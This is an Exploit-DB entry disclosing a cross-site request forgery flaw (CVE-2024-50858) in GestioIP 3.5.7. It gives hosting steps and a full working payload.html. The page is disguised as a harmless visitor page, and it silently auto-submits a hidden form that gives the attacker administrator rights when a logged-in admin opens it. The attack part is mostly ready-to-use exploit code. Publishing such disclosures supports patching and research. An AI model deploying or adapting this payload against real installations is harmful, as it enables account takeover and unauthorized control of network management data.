GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)

EDB-ID:

52200

CVE:

2024-50858

EDB Verified:

Author:

Maximiliano Belino

Type:

remote

Exploit:   /  

Platform:

Multiple

Date:

2025-04-14

Vulnerable App: 
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email : max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50858

### Description

The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.

### Prerequisites

The option "Manage - Manage GestioIP - User Management" must be enabled previously.


### Usage

To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.


### File: payload.html
#### example: editing user named 'maxi'


<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome to our site</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
}
.container {
margin-top: 50px;
}
iframe {
display: none;
}
</style>
</head>
<body>
<div class="container">
<h1>Thank you for visiting our site!</h1>
<p>We are processing your request, please wait a moment...</p>
<img src="https://placehold.co/150?text=Processing" alt="Processing...">
</div>
<!-- hidden iframe -->

<iframe name="hiddenFrame"></iframe>

<!-- The form that makes the POST to GestioIP Server -->
<form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame">
<input type="hidden" name="name" value="maxi">
<input type="hidden" name="group_id" value="1">
<input type="hidden" name="email" value="maxi@test.com">
<input type="hidden" name="phone" value="123">
<input type="hidden" name="comment" value="">
<input type="hidden" name="client_id" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="B2" value="">
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services